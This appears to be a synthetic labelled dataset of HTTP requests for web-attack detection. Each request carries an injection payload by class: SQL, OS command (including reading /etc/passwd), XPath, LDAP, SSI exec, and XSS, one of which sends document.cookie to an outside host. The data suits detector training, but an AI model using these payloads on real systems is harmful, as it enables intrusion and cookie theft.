POST /DB.nxy/7stlxgoHtt/7an99AhtuliDvaHfTt/gLOYRew7Wyg/aiinyil8/gehnvikwhnh6senoznnl/Q1o/lstkQXsystem2YLbetween3i/htdbth/rHndZaIfnp-Ihc6W/9P0a1.shtml? HTTP/1.1
Content-Length: 234
Content-Language: esS,aytn
Content-Encoding: identity
Content-Location: /eegt/lDe0nes.jpg
Content-MD5: ZWVydGVhZEJpZWVyaWFUYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 21 Aug 04 24:18:43 GMT
Last-Modified: Fri, 30 Jul 04 20:00:02 GMT
Host: 30.34.93.239:2639
Connection: rieeej
Accept: */*;q=0.7
Accept-Charset: iso-8859-5, shift_jis;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 140.168.169.121
Cookie: tihirn3Eo=6379273;rqFedojb6tp0l='   group  by   users.id  having 497=497;p1FhomeWQT32.=@Eo(
Cookie2: $Version="75"
Date: Sun, 31 May 09 09:53:29 CET
ETag: W/"D6SYDo5YCkMgqXZPzEv"
Expect: haeo
From: 8rEwHrt@tNno.biz
If-Modified-Since: Tue, 09 Mar 04 23:00:21 UTC
If-Unmodified-Since: Wed, 20 Sep 06 20:46:52 UTC
If-Match: *
If-None-Match: "vzgTDjhA7B4nUiNxGf"
If-Range: *
Max-Forwards: 0214
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: ddues lrijn=5oj80s
Authorization: Digest algorithm=MD5-sess
Range: 48614-31991
Referer: http://Xsrhmqly.uk/Azbe.php
TE: gzip
Trailer: Range
User-Agent: Mozilla/1.4 (X11; U; Open BSD i386 1.5; vt-ta; rv:2.1.5) Gecko/94883462
UA-CPU: MIPS
UA-Disp: 257,411,8
UA-OS: Win98
UA-Color: color8
Via: FTP/8.2 196.63.208.9:6, FTP/5.4 172.192.154.66, 6.7 122.14.74.66
Transfer-Encoding: identity
Upgrade: wio/7.9, nnng/7.1, s21rm/9.9, ondtA/4.0
Warning: 749 www.ibHflcs.js "1xauhotitislrT4ty6co" "Mon, 24 Sep 07 08:58:26 GMT"
X-Forwarded-For: 4.253.23.206
X-Serial-Number: 8958366538347
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

s0h7sb= t|access_loghp&euaGziLtegle6m=tEl&aJ@2SYIriu=i7JaieepgPmdhEs7y&ro6033BbA=hvgH&te2P7sNEn0yense=sst&Eiut90ElleA6A=jGwheres&Ntgseuubabtae=cisee&adtri=o3reel&26wsynhel=Eitcevihyb&io1=wMKkLx.y&tTn4shernpk=u&pecrnTardmedeE=%8hi5

End - Id: 42737
Start - Id: 49462
class: XPathInjection
GET /ttWHPRfIUZ/o4BFPL85zpb/rthinn/fivheeeaeeBdarr5t.jpeg?r9ct=3342&5acncnnbtado=mGp5Rbr&Y3h5erv=1404++or+count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+++++9882%3D&hrIhm1=copyneSieb%2FY&a9bpMqii=n2f7ZmXRk6Jv&rzsdsnNo=2608&4WcopyzN2kHT=6&thtmlbAelcrg=9 HTTP/1.0
Host: www.gathNrrr7.org
Connection: yoifer
Accept: audio/*, audio/*, video/*;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=0
Client-ip: 189.208.211.40
Cookie: rnefsarctnve=nOnMe;Bzupdaten=nac;hAdetwvel=e60HLsfgZ;T2dtiDerreN=oZ_J6GPpjVHc;tTe1e=y~t5;WbLcm0_1V7=mMmi
Cookie2: $Version="182"
Date: Mon, 01 Dec 08 20:39:34 CET
ETag: W/"RvhtSSeefa@GeYDYZ."
Expect: POes=p4aun;djhEbu=gsoao
From: n5thibdN@srSdAet.st
If-Modified-Since: Thu, 19 Aug 04 07:11:22 GMT
If-Unmodified-Since: Sun, 13 Dec 09 23:43:14 UTC
If-Match: "sZ2xhEON3HrNh@Y"
If-None-Match: *
If-Range: "L2_eRyjXKIW6hbHqV5"
Max-Forwards: 52
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: NTLM dGVuaWVyaGZibGZ3c2NzN2U1ZTlyaGxVbGJENWNvZWlzZExnYWdjQXRvc0FmdDc=
Authorization: Digest uri=http://www.sauLhr.st/um6stglg/w1aaLoe/blons/Tdoty/o9ao60t.jpeg
Range: -012
Referer: http://www.iUbjtbee.it/c9tn/ointfs/daep/eeqtq.mp3
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/2.6 (Windows; U; Windows NT 6.6; t2-p6; rv:0.7.4) Gecko/82650114
UA-CPU: PowerPC
UA-Disp: 247,139,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 527x1451
Via: 4.6 www.h82kioE.jpg
Transfer-Encoding: gzip
Upgrade: 7V1i5f/9.3
Warning: 806 44.0.29.60 "Kr4gdh25nfieofeas" 
X-Forwarded-For: 16.113.150.28
X-Serial-Number: 812184590933752195
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49462
Start - Id: 44817
class: PathTransversal
GET /etaA/aiawjecoUchtMeiae/KlocationqnscriptfdropQOinLF/flr/eNwdQ7@qDWJ8CAyDH/tlcTt9g5DT6/OTTatM-1/t5S3QQbKkEkK/irD2igDHzj9Un5P.cfm?Tmt1dT1insevtei=63114635&Y8VBwPnvyoo9=t%28onph-&3evonssavET=uh1AlUjE&Ossn=6217472388&rcsRaRe0z=8354&ryo9bdce4=tmprkstreplacei%3AsWgrnd&ocsngtdats=amtxt&ySotshutdown_dL=4035&ayotafoera9n=oitbosoj&iinshtVr=3033301&mosTetdO=doc%28+++file%3A%2F%2F%2Fc%3A%2Fyi%2Fl9p.xml+++++%29&jaatFtieChtxstd=uiiLer+HtTcmdvbscript%40o2&apNei=tmpuT7&reeoew=wgetimgimgbsamallephaFsso%40+ HTTP/1.0
Host: www.2jhwyla5i.it:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1255;q=0.6, utf-7;q=0.8, cp-936
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 120.170.184.141
Cookie: W2X-9gGQI=slRmwmdhq;id0csz=>eavz@8Nt;t5m3mhruur=e0iss
Cookie2: $Version="23"
Date: Sat, 12 Mar 05 15:59:09 GMT
ETag: "5dTB3_gAXG5Nx4RIfSTO"
Expect: 100-continue
From: srwYoiR5@1klnww.fr
If-Modified-Since: Tue, 08 Jul 08 19:28:27 GMT
If-Unmodified-Since: Sun, 31 May 09 02:36:04 GMT
If-Match: "arvxUYUB2bHptKA2"
If-None-Match: *
If-Range: Fri, 16 Feb 07 12:23:00 CET
Max-Forwards: 05
MIME-Version: 9.8
Pragma: s=yaEdmem
Proxy-Authorization: NTLM YUhlQmxaMW5vM090THVlaXJyZXVldG5zRWJvOWhmbmplbm8wcld3c21udlpwZWU=
Authorization: eH4teM jsxnoc=5ihxiqi
Range: 925-,21-,7-
Referer: http://www.qsekapd.org/mtTzgans/udluHe/t8pfchn.php3
TE: trailers,gzip;q=0.7
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.2 (X11; U; Solaris 2.8; ld-ve; rv:7.8.9) Gecko/56491373
UA-CPU: x86
UA-Disp: 035,8983,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 0162x7659
Via: 4.7 www.sxwrpvn.jpeg:3196, 8.3 www.ebhteech.gif
Transfer-Encoding: compress
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 444 49.226.175.61:095 "anooncjio" "Wed, 26 Jul 06 23:48:52 GMT"
X-Forwarded-For: 65.58.42.42
X-Serial-Number: 13064
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44817
Start - Id: 43652
class: OsCommanding
POST /CTvvB3dPI@Ef1D/MPG/wosutT0iznrbIpuosTn/aa/rrq4eSoOee8s/bUftpuEjA471zR/oJW3rvLxbCA6v/czhsdDa1Qe/y1uE.c73NFIAx7cyF/services@.dll? HTTP/1.1
Content-Length: 29
Content-Language: tEEens,mpmsSnmt,hmarzd
Content-Encoding: identity
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 28 Apr 06 10:03:15 UTC
Host: www.hrtne.de
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: gzip, gzip;q=0.3, compress;q=0.9
Accept-Language: *
Cache-Control: no-store
Cookie: alsnpy1w=Dvbscriptd;Ftdr=    ;    echo ;   w   ;     uname     -a  ;   id;nmAedoola=798780912;uexcade8ssn=4vq;ttisuyia=037655369;Tllq=etne
Cookie2: $Version="859"
Expect: 100-continue
If-Unmodified-Since: Tue, 19 Jan 10 24:13:11 UTC
If-Range: Fri, 18 Dec 09 15:46:24 GMT
Max-Forwards: 9
Authorization: nrt6 hhbrg=opivawgi
Referer: /heweyeh/dasja/1E38xsu/gmtfysuu.jsp
TE: chunked,deflate;q=0.4
User-Agent: Mozilla/5.5 (X11; U; Solaris 6.4; su-d0; rv:3.1.3) Gecko/14138044
UA-Pixels: 7737x6163
Upgrade: sNBmrn/9.3, lAssi/3.6, g1ti/0.1, ks4/3.8, nbweju/7.0

ondlrtEgnwsie=echoashutdownrr

End - Id: 43652
Start - Id: 41429
class: SqlInjection
POST /dd2tuees8obdlhpu/Iudnlda/tnDHrlcnuV/lnqtucd2e/oe4ns/nair/a0hai.tiff? HTTP/1.1
Content-Length: 156
Content-Language: 6sd,g
Content-Encoding: deflate
Content-Location: http://dirrha.it/mZdam/zs0mbt/eoamai/musiaa.js
Content-MD5: b1RlZW51d2R5cWdnOXlobQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 08 Feb 10 12:44:36 UTC
Last-Modified: Fri, 06 May 05 01:31:45 UTC
Host: www.oo0o4Os.be
Connection: fgrwt
Accept: */*
Accept-Charset: euc-kr;q=0.9, big5, x-mac-arabic, iso-8859-5;q=0.7, x-mac-greek;q=0.1
Accept-Encoding: 
Accept-Language: 7me-gh7soaas;q=0.9, jovcem-4e, hirdr-as, eet5v8c-ata0eo0n;q=0.3, a-eards;q=0.8
Cache-Control: no-store
Client-ip: 196.36.129.201
Cookie: u4AeaWlt=3aiadnaof;Anfc8SsToem=tkehuro;Nme9dhtOnrrl8nJ=:d6hnc zbvtdtdw;1rnusghmYnaTi=6180808;8Qp9RUfIUbetweenf=in;C1r5zand79mtb=+techo
Cookie2: $Version="458"
Date: Sat, 11 Dec 04 11:06:15 CET
ETag: W/"4aBq-mQ1_DiT7vYxf"
Expect: enoavte1=egee
From: hbituu@nl5IshaU.be
If-Modified-Since: Sat, 25 Sep 04 10:48:35 UTC
If-Unmodified-Since: Thu, 30 Sep 04 01:13:41 UTC
If-Match: *
If-None-Match: "Ub1oI.0Bnjqt9.p16"
If-Range: *
Max-Forwards: 5
MIME-Version: 0.4
Pragma: hraiaGt3='rann'
Proxy-Authorization: Digest qop=ymsaBhdy
Authorization: Digest response="81F678b71Cec7e540dBdF0573EaC9FC0"
Range: -86
Referer: /nrnntdve.txt
TE: trailers
Trailer: Date
User-Agent: nhogAfNt (tzbBRWUL1; tgFWjJG-; iuMqT833; lGEJK3n; dv9qCPyP)
UA-CPU: MIPS
UA-Disp: 0773,9723,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 738x118
Via: gen/6.5 145.215.31.105
Transfer-Encoding: deflate
Upgrade: rht/5.4
Warning: 594 www.eduo.css "iv5whwy" "Sun, 10 Aug 08 19:07:44 UTC"
X-Forwarded-For: 47.63.17.194
X-Serial-Number: 9168693821015244526
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

do=;alter  table leolchtane    set password    =    '8tIe'    where   name    =   'yeif';&3gmstlk4hae2=715256&a5jhtt4yAI=719&8Hl6lijG=nQeEYt

End - Id: 41429
Start - Id: 46480
class: XSS
GET /"><img src="javascript:alert(document.domain)">? HTTP/1.1
Host: www.eeHutputnt.org
Connection: close
Accept: text/html;q=0.8, audio/*;q=0.6, audio/basic
Accept-Charset: x-mac-chinesetrad;q=0.4
Accept-Encoding: gzip;q=0.7, compress
Accept-Language: Uuphe-htUp, n1in-rs;q=0.4, a-g, az5V-fs
Cache-Control: max-stale=4968
Client-ip: 98.141.212.240
Cookie: 8piepftaoe4p=tialj
Cookie2: $Version="355"
Date: Thu, 05 Jun 08 14:24:30 UTC
ETag: W/"TvYPSOTjowia_CfKxOZ"
Expect: tphW
From: musoa@e4qteeenfg.net
If-Modified-Since: Mon, 15 Dec 08 20:22:02 UTC
If-Unmodified-Since: Wed, 11 Feb 04 24:10:12 GMT
If-Match: *
If-None-Match: *
If-Range: "EHImig7PXy59Qtju"
Max-Forwards: 474
Pragma: iyb7u=etotEb
Proxy-Authorization: NTLM NmlrZHBhbnJlc3cwbGVBc292aWF1YXNtcmk4YWlkc2ZsZHV4YXJwM2t1bWNI
Authorization: iserFt i8zmg=rspfnme
Range: -540
Referer: /qviaam7.cgi
TE: deflate;q=0.6,trailers
Trailer: Pragma
User-Agent: n1CVOW http://www.ssipS.fr
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 139x000
Via: HTTP/1.3 16.151.24.152, FTP/5.2 www.oedi.css, loea/5.6 www.lmuilsea.shtml
Transfer-Encoding: deflate
Upgrade: i9r6of/0.6, tAiumh/1.5
Warning: 938 www.atHFrEd.css:45 "szdtn5eo4is" "Sat, 06 Dec 08 18:20:14 CET"
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46480
Start - Id: 40077
class: SSI
GET /oRnxjCm9ujFJaghRiL/8teimo57Anbovanneo5/haesriresrdsy4Tek5h/piehtPh/sEtsL4eoaunSahGeEa/2A6AmqX81/tfVZc6/dB5hDIvy.msf?Xt1xi7idz=%3C%21++%23%3C%21--+%23exec+++cmd%3D%22id%22--%3E&llxxenlee6=245&pal%uIUB9G=g3yKiR654&bSRr4in=7553 HTTP/1.0
Host: www.La6ne.net:733
Connection: close
Accept: audio/x-wav, image/*;q=0.0
Accept-Charset: euc-tw
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: min-fresh=816
Client-ip: 53.190.46.19
Cookie: eiA=43;LAguYcBQ9Yib=4967007
Cookie2: $Version="642"
Date: Thu, 12 May 05 08:18:41 GMT
ETag: "6MLClxhRoy2z2nIcv"
Expect: fpetd
From: hbdwf2hh@oEzag3e7.de
If-Modified-Since: Thu, 11 Feb 10 08:25:09 UTC
If-Unmodified-Since: Sun, 19 Dec 04 11:02:49 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 21 Nov 04 11:37:57 UTC
Max-Forwards: 2
MIME-Version: 7.5
Pragma: aoPereqI=tfla5o
Proxy-Authorization: tk5tph hFlgrdtC=taleir4
Authorization: Digest nc=7AfFe9A4
Range: 4-,3-,-4
Referer: /chaoa/tWQdapa/shleiire/r8ptT.wmn
TE: trailers,trailers,deflate;q=0.7
Trailer: Transfer-Encoding
User-Agent: itqvnm8
UA-CPU: PowerPC
UA-Disp: 097,3565,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 893x680
Via: 5.6 22.105.75.198, HTTP/8.3 178.233.163.162, i0ti/5.2 65.50.237.6
Transfer-Encoding: Redce
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 187 www.s2nfht.shtml "Idhcekl" 
X-Forwarded-For: 133.223.4.65
X-Serial-Number: 9018401167222078
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40077
Start - Id: 48809
class: XPathInjection
GET /xBUB.UWiH/rt9euCpobnT8aR85/d83PeAWB@8LSc4uxHZ/aHWxQokjox07ukrA./TdocumentCtYB3Qj52replaceju.gif?th6fro=8564&eh=iL0&3SdQg=ns8.&wbug5=679++++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or++++44862%3D HTTP/1.1
Host: www.lfiaetjt3.org
Connection: ahinEg
Accept: audio/*, text/xml
Accept-Charset: x-mac-cyrillic;q=0.7, windows-1257;q=0.8, x-mac-hebrew
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 5.230.196.145
Cookie: jRrAjU=t4ewdderrrar;o4=dati3uxcrsoa
Cookie2: $Version="7"
Date: Sun, 17 Feb 08 23:38:35 GMT
ETag: W/"6WLOop_Whk@w0uCW8DO"
Expect: 100-continue
From: 2geofch9@4eke.org
If-Modified-Since: Sat, 27 Jan 07 01:23:01 GMT
If-Unmodified-Since: Tue, 26 Apr 05 09:03:16 GMT
If-Match: "RZRPaDDHmd0hHYrKxZ"
If-None-Match: "X9E.QW1YwJLUai1jVVCw"
If-Range: Wed, 12 May 04 20:48:31 UTC
Max-Forwards: 6
MIME-Version: 5.2
Pragma: he=L8bt
Proxy-Authorization: Digest response="08bA7c67a569BFcBED9f6CeCC1e6B5Cb"
Authorization: Basic bVAzNmxPOmxsaWVz
Range: 5889-260241,53147-,8-96
Referer: http://1ctnySn.uk/iik0ti/2ahpnlc/7agR.php3
TE: trailers,chunked;q=0.1
Trailer: If-Match
User-Agent: Mozilla/2.7 (X11; U; Linux i586 5.5; 8b-r7; rv:5.7.4) Gecko/25149741
UA-CPU: MIPS
UA-Disp: 065,1900,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 610x7320
Via: 1.0 www.NMtoE5t.htm, FTP/0.3 137.181.39.53, 6.3 www.nvtb1.gif
Transfer-Encoding: compress
Upgrade: 71emX/6.2, hao/6.3, scEf4/7.0
Warning: 989 42.33.152.171 "ej9c" 
X-Forwarded-For: 29.255.158.60
X-Serial-Number: 9894674694471428
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48809
Start - Id: 43635
class: OsCommanding
PUT /zUeI/sotqgnpcean/emcRiGA/qpp8AnoaubsgO/iX/l-n1DhDw12G/YO/lf2htosJe8r/eaEbuaTiaelasB7sw/8HDDinsertinputBPm_gi/QsJJFWescriptZWFl/rrTLqBq7Ts0IuN1.msf? HTTP/1.0
Content-Length: 83
Content-Language: nxah4
Content-Encoding: deflate
Content-Location: http://www.tCreshc.fr/8wjeabra/6jsrn/a4tB.exe
Content-MD5: c2llb09va0hoYXp1cDh1cw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 08 Apr 05 14:30:45 UTC
Last-Modified: Thu, 05 Jan 06 22:46:04 CET
Host: www.seRenrya.fr
Connection: close
Accept: application/*;q=0.4, application/zip;q=0.8, text/*;q=0.9
Accept-Charset: macintosh
Accept-Encoding: gzip;q=0.2, gzip, identity;q=0.7
Accept-Language: a1os-ioim;q=0.6, ebs-bNEl;q=0.5
Cache-Control: no-cache
Client-ip: 157.21.58.178
Cookie: suz= ;    echo      ;   w     ;     uname  -a    ;  id
Cookie2: $Version="04"
Date: Tue, 27 Nov 07 02:17:09 CET
ETag: W/".QW9ECthMnGGMsec"
Expect: litFqehh
If-Modified-Since: Thu, 17 Jul 08 20:18:30 GMT
If-Unmodified-Since: Mon, 21 Nov 05 10:29:19 CET
If-Match: "woJArvzK7FeBRYbYdr"
If-None-Match: "9ew0m7Ka.79E@uBUhc.r"
If-Range: Mon, 18 Oct 04 13:55:07 UTC
Max-Forwards: 930
Pragma: no-cache
Proxy-Authorization: Nrtb80 8aotecrx=cnmhaa
Authorization: lyri 3rsewb=eorlHfW
Range: -3,3-7,27-13
Referer: http://www.otsanj2.be/eUof/eeuen/hUablrt.cfm
TE: trailers,deflate;q=0.7
Trailer: Connection
User-Agent: rLYN-XGjx- http://www.nTeTe.st
UA-Disp: 7880,0277,8
UA-OS: Windows 95
UA-Pixels: 7102x9023
Via: HTTP/9.8 79.227.46.5, HTTP/4.3 www.olrum.jpeg
Transfer-Encoding: ytaT; eash=hjaX
Upgrade: m6flre/8.6, rdtt6n/9.3, sRis/6.2, zHe/7.7
Warning: 587 www.het8r1.gif:387 "tdreuBf" 
----: ----------------

i1aeaelaetiosnu=xmca6eoulettegs&RljaPFPA=sse7a&q0taehtLeh=6773556&lrn6rnbwesqPxuh=i

End - Id: 43635
Start - Id: 43296
class: OsCommanding
GET /where4W1ps/sdnnosHihqo/mvsmDeeHlefndatP1jf/sG@k71Y0wr/snrktnfrsgdSNqesit8/xCwgetJ@G1Z7n10childk/bWGDlinkntelnetmg2Pwp-ib/3eidi5ehii8ereotewle/ejTLBSH.js?ta=%7C+++cat+++%2Fetc%2Fpasswd+%7C&fwmNoe=ucattOp2k%3Eyaa&riltnf=6591 HTTP/1.0
Host: 126.217.148.212
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 244.144.138.121
Cookie: 3locationh1=mPro8vtuju;toimcsegjwttsw=tmptgr3=ths;s2nE=eE/9%darA[Brg;cs1D6=rooPsstylen 1nh5c;AU5SGai=7855309
Cookie2: $Version="50"
Date: Wed, 28 Jan 09 01:57:26 CET
ETag: "1AjIN8knmDrbYXPi"
Expect: mb9t=tpt6m;rlemLtar
From: nJanczi@m0dios.gov
If-Modified-Since: Wed, 04 Feb 04 15:37:36 GMT
If-Unmodified-Since: Sat, 06 Nov 04 16:09:13 CET
If-Match: *
If-None-Match: "LAmvGMzAcUD0vRHprDDq"
If-Range: Mon, 19 Sep 05 05:23:10 UTC
Max-Forwards: 82
MIME-Version: 0.7
Pragma: DxpAwlda='SjlTi2a'
Proxy-Authorization: NTLM YXN0aWluT29qd3VtZWFrbk50aWh0bG1zaXJydGU5RGludEhla3ZlaHRlNXRtYWw=
Authorization: NTLM ZWF3aG52cGN0bXV1bmRhZWhjZGhkblFpYWdtbnVheXJGcnJpY290ZGdoNnNhY3Rp
Range: 534213-
Referer: http://www.foelnn5a.biz/4lms/hlhnti.asmx
TE: deflate;q=0.5
Trailer: Range
User-Agent: Mozilla/8.5 (Windows; U; Win98 1.7; sz-dp; rv:8.8.6) Gecko/04220720
UA-CPU: Sparc
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: evemx/1.6 142.180.216.74, HTTP/5.0 www.iv8air.gif, 1.2 www.hherTlg.htm
Transfer-Encoding: zlag
Upgrade: svhC/6.6, eeeovf/0.6, Rs9jj/2.4, inuc/6.8
Warning: 597 167.142.104.140 "ureioenlrkas6ps" 
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 33268910997830583
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43296
Start - Id: 49729
class: XPathInjection
GET /e7Cey50xlths/ARJ_/exRflwz9r16dXtJv/OrB1winntinputr/eH13/61QZaTlKeweoX.SHha.html?ivC8=9t&rKn=%28i+%3C++count%28er%2Fchild%3A%3Atext%28%29%29+++and++++j+%3C++++count%28byoy%2Fchild%3A%3Acomment%28%29%29+++++and++k+++++%3C++count%28d6it%2Fchild%3A%3A*%29++%29 HTTP/1.0
Host: 95.244.8.34
Connection: te5sYd8d
Accept: text/*;q=0.2, video/quicktime;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: compress, compress;q=0.2, deflate
Accept-Language: vleaivto-In, hgr-l;q=0.8, oO-2h5, t3-clhDsERl;q=0.4
Cache-Control: max-age=1
Client-ip: 24.134.122.55
Cookie: csee2hyes5oe1e=aipTSl;eerme=vVeB_Qlo;Gyformupdate6e4Q2.=tropenntae  %
Cookie2: $Version="2"
Date: Fri, 24 Feb 06 02:53:16 UTC
ETag: "JYMP4D0.htFnvfn"
Expect: YPyCnhd=7cncnni
From: ejeriHt@tvteeteb.fr
If-Modified-Since: Sun, 01 Feb 09 13:25:53 GMT
If-Unmodified-Since: Wed, 10 Jun 09 11:31:13 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 21 May 07 16:40:09 GMT
Max-Forwards: 6
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest cnonce="iest9re"
Authorization: Basic OTFuZWxlOmFvZXM=
Range: -37003,-5,-1
Referer: /Oc3re/6ny4/rlst/5vLcsor/sdib.jpeg
TE: trailers
Trailer: Via
User-Agent: Mozilla/7.5 (X11; U; Linux i386 7.5; tr-s4; rv:5.3.9) Gecko/45998622
UA-CPU: StrongARM
UA-Disp: 3498,894,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 7900x666
Via: 9.9 www.teez.gif, 6.7 www.wlycsnOx.js, 4.7 www.leys.png
Transfer-Encoding: compress
Upgrade: 2sv/4.0, uetOn/7.3
Warning: 623 www.Cxer.gif "wenr" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 9273829516846529
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49729
Start - Id: 37547
class: LdapInjection
POST /socatir.cfm? HTTP/1.0
Content-Length: 247
Content-Language: u,dUFoi
Content-Encoding: deflate
Content-Location: /s6dikn/umcaw/l9Oe/o6amcyT/tife.png
Content-MD5: eW1hZWF0NWNpZXJzb3M2bw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Oct 07 19:40:03 CET
Last-Modified: Tue, 14 Mar 06 23:41:22 GMT
Host: 193.240.232.67:69090
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: n-oooedh;q=0.2, tjgenoc-dtzue;q=0.7, iiMste-swt;q=0.4, c-oboAsTe
Cache-Control: max-stale
Client-ip: 128.166.47.177
Cookie: nurahoWehie=e gyaeee0(vstdinformqhs
Cookie2: $Version="00"
Date: Sat, 28 Aug 04 04:48:27 UTC
ETag: "DKMeyFEGPC-DDbSpr"
Expect: 3hainp=yeeT
From: nIt1h@rvrs.org
If-Modified-Since: Sun, 19 Sep 04 21:12:12 CET
If-Unmodified-Since: Wed, 28 Jun 06 12:32:32 UTC
If-Match: "5HrHWNqt-vzBcgI8"
If-None-Match: "FfXz0MQlWO0Py95pXt"
If-Range: "H_oMizhNmQ6MKBEAYj"
Max-Forwards: 795
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: NTLM MWh3dWdhbzRnbFRudnVqZmpiRWxsbmgzZHMwd2IyZWZsZWVuaEpkb25jcWdFTnV0
Authorization: NTLM emxsb2Rhc3FjOWVuZHRiZGp0eVNpdHlzZGUxc2k0c3JSaW8wZXc=
Range: 0516-7855,069180-,334-
Referer: /thoobdvd.jsp
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.8 (compatible; MSIE 9.7; Linux i386; aiairm; djNKters; joh12)
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 1680x065
Via: 5.9 216.20.13.22
Transfer-Encoding: deflate
Upgrade: 7dan1/4.1, egy/8.2, adh/9.9, duh9t/0.3
Warning: 983 109.244.195.91 "L7Uqnd6Rnxrtrw" "Mon, 04 Apr 05 04:37:49 GMT"
X-Serial-Number: 749091
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Tae=)( |(cn=*o    'brien*   )(mail =*o'brien*) &AtXsXoeba9=eX1lQDNmYSh&aim=ie&sft7eeedSyeelfe=p'&0o1oemsd5oo=610688&gab=yst2MeiO&cOaageeie=06675&l2QrjS1eW=nbtprNhce'nodei&itEnloe=a5@sjuhavingya he&stvYto64=iNsaalo;ne3

End - Id: 37547
Start - Id: 47661
class: XSS
GET /mvxreqLpoCddntwra/chfGxdvcdHe/d@k/nG/wHO.php3?Me=79&s4roownh=6r%26-pfd&yplw4RK=execr%3C&Fsim5e=iwNbaL1F&etqld=%3Cmeta+++http-equiv%3D+++%22+refresh%22+++++content++%3D+++%22++0%3Burl%3Djavascript%3A+%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.geienaes.com%2Fcgi-bin%2Flelanede.cgi%27%2Bdocument.cookie%29%3B%5D%22%3E&EeadT1e0=wneCe+%27%28f%3B&un3pepe=a%25eendt%3BYoJ+S&afwbmaenstee3oe=ibgsoundnd%28 HTTP/1.1
Host: www.boekt.st:0
Connection: close
Accept: */*;q=0.1
Accept-Charset: windows-1254, x-mac-turkish;q=0.0
Accept-Encoding: gzip;q=0.3, deflate;q=0.0
Accept-Language: heeiHm-t
Cache-Control: no-store
Client-ip: 39.154.184.38
Cookie: Lhea=2438;gyyp7biehlge=Ltwh;mtexs=4163
Cookie2: $Version="6"
Date: Tue, 23 Feb 10 09:39:44 GMT
ETag: W/"T6GZychf4Xyzvl1pm"
Expect: 100-continue
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Thu, 25 Oct 07 22:17:01 GMT
If-Unmodified-Since: Tue, 14 Jul 09 20:12:12 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 08 Feb 08 15:22:52 UTC
Max-Forwards: 23
MIME-Version: 7.7
Pragma: iszdr=cI2iblQ
Proxy-Authorization: bxdtp1 pwtsrI=RoiSgk
Authorization: NTLM ZWhic244cGh0c29uZVVhdXJ0YWV1UmU1czNoYmQ4dDVHb2E=
Range: 51-,059585-
Referer: http://otatms.ch/owezce.avi
TE: gzip;q=0.3,chunked;q=0.1,gzip
Trailer: From
